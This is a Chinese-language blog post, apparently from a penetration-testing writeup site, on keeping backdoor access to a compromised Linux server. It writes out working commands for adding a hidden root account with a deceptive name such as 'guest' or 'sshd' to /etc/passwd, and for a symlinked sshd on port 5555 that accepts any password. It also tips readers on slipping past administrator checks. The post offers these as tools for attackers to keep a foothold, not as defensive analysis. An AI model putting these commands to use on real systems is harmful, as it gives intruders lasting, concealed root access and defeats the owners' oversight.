Linux下权限维持之后门登陆


简介:

好不容易拿到的 shell 不能白白放弃,加个后门,方便下次再来。

一、添加管理员用户

echo "guest:x:0:0::/:/bin/sh" >> /etc/passwd && echo 'guest:123456'|chpasswd

添加管理员用户这里没什么好说的,需要说的就是尽量使用一些具有迷惑性的名字,比如 guest,sshd,http,openssl 这些具有迷惑性的名字,即使是管理员检查用户的时候也有可能蒙混过关。
有时候不成功可能是因为存在密码策略,设置的密码过于简单了,增强密码的强壮型即可。

二、利用系统特性伪装成一个免密登陆后门

生成软链接后门:

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555

这样直接使用 ssh 工具使用指定的 5555 端口登录,然后密码随便输入一个即可,比如直接使用 Windows 10 下的 CMD 窗口:

ssh [email protected] -p 5555

如下图:
img

密码随便输入即可登录系统,并且是你当前登录的用户的权限。当然也可以使用 XShell 软件登录,不过要注意修改端口,密码依旧是随便输入:
img
如果目标机器并未开始 5555 端口则需要你手动开启一下端口,但是如果得到的是阿里云这种云服务器的话本地开端口是不行的。

参考引用:

一条命令引发的思考:https://www.cnblogs.com/sevck/p/6495884.html


文章作者: Writeup
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Writeup !
 上一篇
利用Linux的SUID权限和PATH环境变量来提权 利用Linux的SUID权限和PATH环境变量来提权
简介:1.SUID 简介SUID 是 Linux 下的一种特殊权限,一般只有二进制可执行文件可以被赋予此权限。命令执行者在执行被赋予了 SUID 权限的文件时,获得此文件的所有者的权限,在此文件程序运行结束,临时获得的文件所有者的权限也将相
2020-10-08
下一篇 
Linux下权限维持之利用Crontab定时任务反弹shell Linux下权限维持之利用Crontab定时任务反弹shell
一、简介crontab 是 Linux 下的一个定时任务执行管理工具,类似于 Windows 下的计划任务,在目前所有的知名 Linux 发行版中,都会默认安装此服务工具,并且默认是开启状态。大致用法如下: # 每1分钟执行一次comman
2020-10-08
  目录